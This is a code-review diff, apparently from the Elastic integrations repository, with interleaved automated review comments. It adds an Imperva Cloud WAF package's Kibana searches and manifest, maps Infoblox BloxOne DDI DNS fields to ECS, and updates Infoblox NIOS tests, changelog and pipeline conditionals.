"e1b971a5-c7f3-4c2c-a27c-d2a26f40a806:3312999c-205a-4d09-bb15-dc5818d3e852", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4eb2b76f-3066-4014-99fa-13480dc52eb0:indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4eb2b76f-3066-4014-99fa-13480dc52eb0:78ef208b-b924-4bd2-8580-5a0deb623228", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0490de70-9dd6-4c32-954a-bd09449ee454:indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + 
{ + "id": "logs-*", + "name": "0490de70-9dd6-4c32-954a-bd09449ee454:6c409d07-89d2-4e87-b07e-702d25cd289a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a:indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf7d51b5-cbe7-4bd2-99cd-f9e1e568c48a:9534999d-5b48-4638-a917-ae394c55590e", + "type": "index-pattern" + }, + { + "id": "imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773", + "name": "6257b78c-5231-4331-96e9-1aaba70a07b4:panel_6257b78c-5231-4331-96e9-1aaba70a07b4", + "type": "search" + }, + { + "id": "imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773", + "name": "e20845e9-4f72-4f52-9047-513a17014667:panel_e20845e9-4f72-4f52-9047-513a17014667", + "type": "search" + }, + { + "id": "logs-*", + "name": "90a17859-87de-4d61-8ed6-d5c57a797613:layer_1_source_index_pattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_2dccd049-7bea-48b0-ab19-7ffbbcd453f1:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5bb7309d-d7d1-41f5-9326-604454396111:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_449e7daa-7a00-4195-8844-380171d6a2ab:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/redis/kibana/search/redis-73613570-4791-11e7-be88-2ddb32f3df97.json b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773.json similarity index 72% rename from packages/redis/kibana/search/redis-73613570-4791-11e7-be88-2ddb32f3df97.json rename to packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773.json index b458ca44013..00d6fa5cd62 100644 --- a/packages/redis/kibana/search/redis-73613570-4791-11e7-be88-2ddb32f3df97.json 
+++ b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773.json @@ -1,13 +1,14 @@ { "attributes": { "columns": [ - "host.name", - "log.level", - "redis.log.role", - "message" + "source.user.id", + "imperva_cloud_waf.event.extensions.site.id", + "source.service.name" ], "description": "", - "hits": 0, + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -18,28 +19,27 @@ "meta": { "alias": null, "disabled": false, + "field": "data_stream.dataset", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "key": "data_stream.dataset", "negate": false, "params": { - "query": "redis.log" + "query": "imperva_cloud_waf.event" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "redis.log" + "data_stream.dataset": "imperva_cloud_waf.event" } } } ], - "highlightAll": true, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", "query": "" - }, - "version": true + } } }, "sort": [ @@ -48,12 +48,13 @@ "desc" ] ], - "title": "Logs [Logs Redis]", - "version": 1 + "timeRestore": false, + "title": "Site Essential Details [Logs Imperva Cloud WAF]", + "usesAdHocDataView": false }, "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-23T06:20:05.818Z", - "id": "redis-73613570-4791-11e7-be88-2ddb32f3df97", + "created_at": "2024-02-21T09:52:08.110Z", + "id": "imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773", "managed": true, "references": [ { @@ -65,11 +66,6 @@ "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" } ], "type": "search", 
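Review bot: `"managed": true` is kept on this saved search, and the second saved search in this commit sets it the same way, while the dashboard that references both (its section ends just above this one) is written with `"managed": false`. The three saved objects ship in the same package and are presumably expected to carry the same value, so confirm which one the packaging tooling expects and align the dashboard or the searches accordingly. A short comment in the PR description naming the intended value would also help, since the field is easy to overlook in generated JSON.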
diff --git a/packages/kubernetes/kibana/search/kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8.json b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773.json similarity index 54% rename from packages/kubernetes/kibana/search/kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8.json rename to packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773.json index 689683825df..f37e182ffa2 100644 --- a/packages/kubernetes/kibana/search/kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8.json +++ b/packages/imperva_cloud_waf/kibana/search/imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773.json @@ -1,24 +1,33 @@ { "attributes": { "columns": [ - "kubernetes.event.type", - "kubernetes.event.reason", - "kubernetes.event.involved_object.name" + "url.original", + "http.request.method", + "imperva_cloud_waf.event.extensions.device.custom_string6", + "event.action", + "source.geo.country_iso_code", + "source.ip" ], - "description": "Kubernetes Warnings", + "description": "", "grid": { "columns": { - "kubernetes.event.involved_object.kind": { - "width": 198.30555555555554 + "event.action": { + "width": 262 }, - "kubernetes.event.metadata.namespace": { - "width": 249.83333333333337 + "http.request.method": { + "width": 154 }, - "kubernetes.event.reason": { - "width": 176.33333333333331 + "imperva_cloud_waf.event.extensions.device.custom_string6": { + "width": 421 }, - "kubernetes.event.type": { - "width": 156.91666666666663 + "source.geo.country_iso_code": { + "width": 255 + }, + "source.ip": { + "width": 214 + }, + "url.original": { + "width": 284 } } }, 
@@ -34,17 +43,18 @@ "meta": { "alias": null, "disabled": false, + "field": "data_stream.dataset", "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "kubernetes.event.type", + "key": "data_stream.dataset", "negate": false, "params": { - "query": "Warning" + "query": "imperva_cloud_waf.event" }, "type": "phrase" }, "query": { "match_phrase": { - "kubernetes.event.type": "Warning" + "data_stream.dataset": "imperva_cloud_waf.event" } } } @@ -52,11 +62,10 @@ "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.event\" " + "query": "data_stream.dataset : \"imperva_cloud_waf.event\" " } } }, - "rowHeight": -1, "sort": [ [ "@timestamp", @@ -64,26 +73,25 @@ ] ], "timeRestore": false, - "title": "Kubernetes Warnings", + "title": "Events Essential Details [Logs Imperva Cloud WAF]", "usesAdHocDataView": false }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T08:05:47.489Z", - "id": "kubernetes-ee55101a-9f62-44da-b64c-ffa1eb5abad8", - "migrationVersion": { - "search": "8.0.0" - }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-21T09:52:08.110Z", + "id": "imperva_cloud_waf-c10e98f0-9cbf-11ee-b689-05e9d8af2773", + "managed": true, "references": [ { - "id": "metrics-*", + "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern" }, { - "id": "metrics-*", + "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/imperva_cloud_waf/manifest.yml b/packages/imperva_cloud_waf/manifest.yml new file mode 100644 index 00000000000..d22d498ba8a --- /dev/null +++ b/packages/imperva_cloud_waf/manifest.yml 
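Review bot: The kuery `query` in the `@@ -52,11 +62,10 @@` hunk restates the dataset constraint, `"query": "data_stream.dataset : \"imperva_cloud_waf.event\" "`, even though the phrase filter in the hunk above already pins `data_stream.dataset` to the same value, so the constraint now lives twice in one saved search and the query string carries a trailing space. The other saved search in this commit, `imperva_cloud_waf-4c603c80-9a84-11ee-b689-05e9d8af2773`, relies on the filter alone and leaves `"query": ""`; doing the same here keeps the two consistent and removes the duplication.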
@@ -0,0 +1,37 @@
+format_version: 3.0.3
+name: imperva_cloud_waf
+title: Imperva Cloud WAF
+version: 0.3.0
+description: Collect logs from Imperva Cloud WAF with Elastic Agent.
+type: integration
+categories:
+ - security
+conditions:
+ kibana:
+ version: ^8.12.0
+ elastic:
+ subscription: basic
+screenshots:
+ - src: /img/imperva-cwaf-dashboard.png
+ title: Imperva Cloud WAF Dashboard
+ size: 600x600
+ type: image/png
+icons:
+ - src: /img/imperva-logo.svg
+ title: Sample logo
+ size: 32x32
+ type: image/svg+xml
+policy_templates:
+ - name: imperva_cloud_waf
+ title: Imperva Cloud WAF logs
+ description: Collect logs from Imperva Cloud WAF instance.
+ inputs:
+ - type: aws-s3
+ title: Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS
+ description: Collecting logs from Imperva Cloud WAF via AWS S3 or AWS SQS.
+ - type: cel
+ title: Collect Imperva Cloud WAF logs via API
+ description: Collecting Imperva Cloud WAF logs via API.
+owner:
+ github: elastic/security-service-integrations
+ type: elastic
diff --git a/packages/imperva_cloud_waf/validation.yml b/packages/imperva_cloud_waf/validation.yml
new file mode 100644
index 00000000000..ddfb73e9384
--- /dev/null
+++ b/packages/imperva_cloud_waf/validation.yml
@@ -0,0 +1,4 @@
+errors:
+ exclude_checks:
+ - SVR00002 # Mandatory filters in dashboards.
+ - SVR00004 # References in dashboards.
diff --git a/packages/infoblox_bloxone_ddi/changelog.yml b/packages/infoblox_bloxone_ddi/changelog.yml
index f2b1c737bda..172688105d0 100644
--- a/packages/infoblox_bloxone_ddi/changelog.yml
+++ b/packages/infoblox_bloxone_ddi/changelog.yml
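Review bot: The icon entry for `/img/imperva-logo.svg` still carries the placeholder `title: Sample logo`; this is user-facing package metadata, so it should name the vendor the way the screenshot entry does, e.g. `title: Imperva logo`. The `cel` input description, `Collecting Imperva Cloud WAF logs via API.`, does not say which API is polled, whereas the aws-s3 input names both of its transports; naming the Imperva API in that description helps operators choose between the two inputs. Both are documentation-only changes within this hunk.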
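Review bot: validation.yml excludes `SVR00002` and `SVR00004` with only the check names as comments, so a reader cannot tell which panel or reference trips them or whether the exclusion is meant to outlive this first release. The dashboard panels earlier in this diff do carry a `data_stream.dataset` phrase filter on `imperva_cloud_waf.event`, so `SVR00002` (mandatory filters in dashboards) may not need excluding at all; if a specific panel still fails, say so in the comment, e.g. `- SVR00002 # Mandatory filters in dashboards; <panel or reason> — TODO remove once fixed.` The same applies to `SVR00004`, since the dashboard's `references` list is already populated.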
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "1.15.0" + changes: + - description: Map DNS fields to ECS. + type: enhancement + link: https://github.com/elastic/integrations/pull/9062 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json b/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json index aa964c3c65c..3a2584ec323 100644 --- a/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json +++ b/packages/infoblox_bloxone_ddi/data_stream/dns_data/_dev/test/pipeline/test-pipeline-dns-data.log-expected.json @@ -3,8 +3,18 @@ { "@timestamp": "2022-07-20T09:59:59.184Z", "dns": { - "answers": { - "ttl": 0 + "answers": [ + { + "data": "string", + "ttl": 0, + "type": "string" + } + ], + "question": { + "name": "string", + "registered_domain": "string", + "subdomain": "string", + "type": "string" } }, "ecs": { @@ -111,8 +121,18 @@ { "@timestamp": "2022-07-14T11:50:28.838Z", "dns": { - "answers": { - "ttl": 0 + "answers": [ + { + "data": "DNS rdata", + "ttl": 0, + "type": "AAAA" + } + ], + "question": { + "name": "Test name", + "registered_domain": "test Zone", + "subdomain": "Test zone", + "type": "AAAA" } }, "ecs": { @@ -200,8 +220,18 @@ { "@timestamp": "2022-07-20T09:59:59.184Z", "dns": { - "answers": { - "ttl": 0 + "answers": [ + { + "data": "DNS RData", + "ttl": 0, + "type": "DNS Data Type" + } + ], + "question": { + "name": "DNS Absolute Name", + "registered_domain": "DNS Absolute Zone Name", + "subdomain": "DNS Name in Zone", + "type": "DNS Data Type" } }, "ecs": { 
diff --git a/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml b/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml
index 153d9a5899e..60217ed5289 100644
--- a/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/infoblox_bloxone_ddi/data_stream/dns_data/elasticsearch/ingest_pipeline/default.yml
@@ -370,10 +370,6 @@ processors:
 - append:
 field: error.message
 value: '{{{_ingest.on_failure_message}}}'
- - set:
- field: dns.answers.ttl
- copy_from: infoblox_bloxone_ddi.dns_data.ttl
- ignore_failure: true
 - rename:
 field: json.type
 target_field: infoblox_bloxone_ddi.dns_data.type
@@ -404,6 +400,41 @@ processors:
 field: json.zone
 target_field: infoblox_bloxone_ddi.dns_data.zone
 ignore_missing: true
+ - set:
+ field: dns.answers.data
+ copy_from: infoblox_bloxone_ddi.dns_data.rdata_value
+ ignore_empty_value: true
+ - set:
+ field: dns.answers.ttl
+ copy_from: infoblox_bloxone_ddi.dns_data.ttl
+ ignore_empty_value: true
+ - set:
+ field: dns.answers.type
+ copy_from: infoblox_bloxone_ddi.dns_data.type
+ ignore_empty_value: true
+ - script:
+ lang: painless
+ if: ctx.dns?.answers != null
+ source: |
+ def a = new ArrayList();
+ a.add(ctx.dns.answers);
+ ctx.dns.answers = a;
+ - set:
+ field: dns.question.type
+ copy_from: infoblox_bloxone_ddi.dns_data.type
+ ignore_empty_value: true
+ - set:
+ field: dns.question.name
+ copy_from: infoblox_bloxone_ddi.dns_data.absolute.name.spec
+ ignore_empty_value: true
+ - set:
+ field: dns.question.registered_domain
+ copy_from: infoblox_bloxone_ddi.dns_data.absolute.zone.name
+ ignore_empty_value: true
+ - set:
+ field: dns.question.subdomain
+ copy_from: infoblox_bloxone_ddi.dns_data.name_in.zone
+ ignore_empty_value: true
 - remove:
 field: json
 ignore_missing: true
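Review bot: The `script` processor in the `@@ -404,6 +400,41 @@` hunk wraps `ctx.dns.answers` into a list whenever the object exists, so a record that has a `ttl` or `type` but no `rdata_value` yields an answer object with no `data` key, which the `dns.answers` description added to docs/README.md later in this diff states is the minimum an answer object must contain. The three `set` processors above it each use `ignore_empty_value: true` independently, so nothing enforces that `dns.answers.data` is present before the wrap. One option, shown below, is to drop the partial object instead of emitting it; a smaller variant is `if: ctx.dns?.answers?.data != null` on the script plus a conditional `remove` of `dns.answers`. Separately, `dns.question.registered_domain` is copied from `absolute.zone.name` and `dns.question.subdomain` from `name_in.zone`; a zone name is not necessarily the registered domain (zones can be delegated below it), so this looks like an approximation and deserves a comment saying so.
```yaml
  - script:
      lang: painless
      if: ctx.dns?.answers != null
      source: |
        // ECS requires `data` in every answer object; drop a partial answer rather than emit one without it.
        if (ctx.dns.answers.data == null) {
          ctx.dns.remove('answers');
        } else {
          def a = new ArrayList();
          a.add(ctx.dns.answers);
          ctx.dns.answers = a;
        }
  # … unchanged: dns.question.* set processors …
```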
@@ -413,6 +444,11 @@ processors:
 - infoblox_bloxone_ddi.dns_data.lame_ttl
 - infoblox_bloxone_ddi.dns_data.created_at
 - infoblox_bloxone_ddi.dns_data.id
+ - infoblox_bloxone_ddi.dns_data.type
+ - infoblox_bloxone_ddi.dns_data.absolute.name.spec
+ - infoblox_bloxone_ddi.dns_data.absolute.zone.name
+ - infoblox_bloxone_ddi.dns_data.name_in.zone
+ - infoblox_bloxone_ddi.dns_data.rdata_value
 if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))
 ignore_failure: true
 ignore_missing: true
diff --git a/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml b/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml
index 04b28dc660f..4ef70f75af8 100644
--- a/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml
+++ b/packages/infoblox_bloxone_ddi/data_stream/dns_data/fields/ecs.yml
@@ -1,5 +1,20 @@
+- external: ecs
+ name: dns.answers
+ type: group
+- external: ecs
+ name: dns.answers.data
 - external: ecs
 name: dns.answers.ttl
+- external: ecs
+ name: dns.answers.type
+- external: ecs
+ name: dns.question.name
+- external: ecs
+ name: dns.question.registered_domain
+- external: ecs
+ name: dns.question.subdomain
+- external: ecs
+ name: dns.question.type
 - external: ecs
 name: ecs.version
 - external: ecs
diff --git a/packages/infoblox_bloxone_ddi/docs/README.md b/packages/infoblox_bloxone_ddi/docs/README.md
index da6d9522578..982b96a446b 100644
--- a/packages/infoblox_bloxone_ddi/docs/README.md
+++ b/packages/infoblox_bloxone_ddi/docs/README.md
@@ -1433,7 +1433,14 @@ An example event for `dns_data` looks as following: | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | +| dns.answers | An array containing an object for each answer section returned by the server. The main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines. Not all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields. | group | +| dns.answers.data | The data describing the resource. The meaning of this data depends on the type and class of the resource record. | keyword | | dns.answers.ttl | The time interval in seconds that this resource record may be cached before it should be discarded. Zero values mean that the data should not be cached. | long | +| dns.answers.type | The type of data contained in this resource record. | keyword | +| dns.question.name | The name being queried. If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. | keyword | +| dns.question.registered_domain | The highest registered domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". 
| keyword | +| dns.question.subdomain | The subdomain is all of the labels under the registered_domain. If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| dns.question.type | The type of record being queried. | keyword | | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | | event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | diff --git a/packages/infoblox_bloxone_ddi/manifest.yml b/packages/infoblox_bloxone_ddi/manifest.yml index e1649131343..ba058cf6ca7 100644 --- a/packages/infoblox_bloxone_ddi/manifest.yml +++ b/packages/infoblox_bloxone_ddi/manifest.yml 
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: infoblox_bloxone_ddi
 title: Infoblox BloxOne DDI
-version: "1.14.1"
+version: "1.16.0"
 description: Collect logs from Infoblox BloxOne DDI with Elastic Agent.
 type: integration
 categories:
@@ -10,7 +10,7 @@ categories:
 - dns_security
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 screenshots:
 - src: /img/infoblox-bloxone-ddi-screenshot.png
 title: Infoblox BloxOne DDI dashboard screenshot
@@ -52,6 +52,7 @@ policy_templates:
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: proxy_url
 type: text
 title: Proxy URL
diff --git a/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml b/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml
index 34637d7c378..00a3278e1bf 100644
--- a/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml
+++ b/packages/infoblox_nios/_dev/deploy/docker/docker-compose.yml
@@ -7,14 +7,12 @@ services:
 - ${SERVICE_LOGS_DIR}:/var/log
 command: /bin/sh -c "cp /sample_logs/* /var/log/"
 infoblox_nios-log-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9027 -p=tcp /sample_logs/log.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9027 -p=tcp /sample_logs/log.log
 infoblox_nios-log-udp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9028 -p=udp /sample_logs/log.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9028 -p=udp /sample_logs/log.log
diff --git a/packages/infoblox_nios/changelog.yml b/packages/infoblox_nios/changelog.yml
index fd4f8cd4150..d8ea99d8413 100644
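Review bot: `secret: true` in the `@@ -52,6 +52,7 @@` hunk is attached to a variable whose `name` line sits above the hunk, so which setting becomes a secret is not visible here, while the 1.16.0 changelog entry speaks of "sensitive values" in the plural; confirm no other credential-bearing variable in this policy template was missed. `proxy_url` directly below stays a plain `text` field; if operators may embed credentials in the proxy URL (`scheme://user:pass@host` form), it is worth either marking it secret as well or stating in its description that credentials must not be placed there. The Kibana constraint bump to `^8.12.0` in the `@@ -10,7 +10,7 @@` hunk is presumably what `secret: true` requires; a one-line comment next to it, e.g. `# ^8.12.0 needed for secret: true on package variables`, would tie the two changes together for the next reader.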
--- a/packages/infoblox_nios/changelog.yml +++ b/packages/infoblox_nios/changelog.yml @@ -1,7 +1,22 @@ # newer versions go on top +- version: "1.21.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 +- version: "1.20.3" + changes: + - description: Remove incorrect `client.domain` mapping from dns logs. + type: bugfix + link: https://github.com/elastic/integrations/pull/9351 +- version: "1.20.2" + changes: + - description: Clean up null handling, formatting. + type: bugfix + link: https://github.com/elastic/integrations/pull/9180 - version: "1.20.1" changes: - - description: Changed owners + - description: Changed owners. type: enhancement link: https://github.com/elastic/integrations/pull/8943 - version: "1.20.0" @@ -9,7 +24,6 @@ - description: Handle RPZ Hit log messages. type: enhancement link: https://github.com/elastic/integrations/pull/8936 - - version: "1.19.4" changes: - description: Deal with DNS data that ends in `...` and fix network.transport to only include udp/tcp. diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index de5ff858d0c..4a618b73d31 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/infoblox_nios/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json @@ -389,7 +389,6 @@ { "@timestamp": "2024-03-09T23:59:59.000Z", "client": { - "domain": "config.nos-avg.cz", "ip": "192.168.0.1", "port": 59735 }, @@ -423,7 +422,6 @@ }, "related": { "hosts": [ - "config.nos-avg.cz", "infoblox.localdomain" ], "ip": [ @@ -437,7 +435,6 @@ { "@timestamp": "2024-03-09T23:59:59.000Z", "client": { - "domain": "config.nos-avg.cz", "ip": "192.168.0.1", "port": 59735 }, 
@@ -928,7 +925,6 @@ { "@timestamp": "2024-03-11T23:51:31.000Z", "client": { - "domain": "test.com", "ip": "192.168.0.1", "port": 57027 }, @@ -984,7 +980,6 @@ { "@timestamp": "2024-03-11T23:51:31.000Z", "client": { - "domain": "test.com", "ip": "192.168.0.1", "port": 57027 }, @@ -1288,7 +1283,6 @@ { "@timestamp": "2024-04-14T16:16:05.000Z", "client": { - "domain": "ocsp.digicert.com", "ip": "192.168.1.90", "port": 64727 }, @@ -1356,7 +1350,6 @@ { "@timestamp": "2024-04-14T16:16:05.000Z", "client": { - "domain": "ocsp.digicert.com", "ip": "192.168.1.90", "port": 64727 }, @@ -1392,9 +1385,6 @@ "pid": 2588 }, "related": { - "hosts": [ - "ocsp.digicert.com" - ], "ip": [ "192.168.1.90", "10.50.1.227" @@ -2451,7 +2441,6 @@ "name": "Bredband2 AB" } }, - "domain": "abugtera.tun.p2.42", "geo": { "city_name": "Linköping", "continent_name": "Europe", @@ -2527,7 +2516,6 @@ { "@timestamp": "2024-11-27T11:53:09.000Z", "client": { - "domain": "version.bind", "ip": "10.4.71.204", "port": 40026 }, diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml index bcf54b7dcc6..23b7d77d581 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -6,3 +6,5 @@ vars: data_stream: vars: preserve_original_event: true +assert: + hit_count: 105 diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml index d4096d36a44..e2498f650dc 100644 --- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -7,3 +7,5 @@ data_stream: vars: listen_port: 9027 preserve_original_event: true +assert: + hit_count: 105 
diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml
index e2b73a79118..6772c3c0bd6 100644
--- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml
+++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-config.yml
@@ -7,3 +7,5 @@ data_stream:
 vars:
 listen_port: 9028
 preserve_original_event: true
+assert:
+ hit_count: 105
diff --git a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml
index 1dd259ec57d..d83a8bcaba0 100644
--- a/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml
+++ b/packages/infoblox_nios/data_stream/log/_dev/test/system/test-udp-tz-config.yml
@@ -8,3 +8,5 @@ data_stream:
 listen_port: 9028
 preserve_original_event: true
 tz_offset: "+0500"
+assert:
+ hit_count: 105
diff --git a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index b9fdae66853..a13087292ed 100644
--- a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -79,13 +79,13 @@ processors:
 - set:
 field: '@timestamp'
 value: '{{{event.created}}}'
- if: "ctx.event?.created != null"
+ if: ctx.event?.created != null
 override: true
 # If individual pipelines has timestamp, they should take priority. This makes @timestamp < event.created conforming to ECS.
 - set:
 field: '@timestamp'
 value: '{{{_tmp.timestamp}}}'
- if: "ctx._tmp?.timestamp != null"
+ if: ctx._tmp?.timestamp != null
 override: true
 - convert:
 field: _tmp.host.ip
diff --git a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml
index 0aa6269588d..668f023cd85 100644
--- a/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml
+++ b/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_audit.yml
@@ -90,10 +90,10 @@ processors:
 if (ctx.infoblox_nios == null) {
 ctx['infoblox_nios'] = new HashMap();
 }
- if (ctx.infoblox_nios?.log == null) {
+ if (ctx.infoblox_nios.log == null) {
 ctx.infoblox_nios['log'] = new HashMap();
 }
- if (ctx.infoblox_nios?.log?.audit == null) {
+ if (ctx.infoblox_nios.log.audit == null) {
 ctx.infoblox_nios.log['audit'] = new HashMap();
 }
